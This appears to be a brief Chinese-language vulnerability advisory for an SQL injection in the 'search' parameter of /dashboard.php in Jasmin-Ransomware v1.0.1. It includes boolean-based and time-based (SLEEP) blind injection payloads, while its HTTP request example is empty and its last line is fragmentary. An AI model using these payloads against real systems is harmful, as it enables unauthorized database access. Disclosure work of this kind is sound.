关键信息 漏洞描述 漏洞类型: SQL注入 (SQLi) 受影响软件: Jasmin-Ransomware v1.0.1 易受攻击文件: /dashboard.php 参数: search 详细信息 厂商: Jasmin-Ransomware 软件链接: codesiddhant/jasmin-Ransomware - Jasmin Ransomware 是一个高级红队工具(WannaCry 克隆),用于模拟真实的勒索软件攻击,帮助安全研究人员克服外部攻击的风险。 版本 版本: V1.0.1 POC (概念验证) HTTP 请求示例 参数分析 参数: search (GET) 类型: 布尔盲注和时间盲注 布尔盲注: - 标题: AND 布尔盲注 - WHERE 或 HAVING 子句 - 负载: search='1' AND 3781=3781 AND ('Gxmz' LIKE 'Gxmz&pageno=1 时间盲注: - 标题: MySQL >= 5.0.12 AND 时间盲注 (SLEEP) - 负载: search='1' AND SLEEP(5) AND ('oNUy' LIKE 'oNUy&pageno=1 `` /dashboard.php search` 参数进行利用。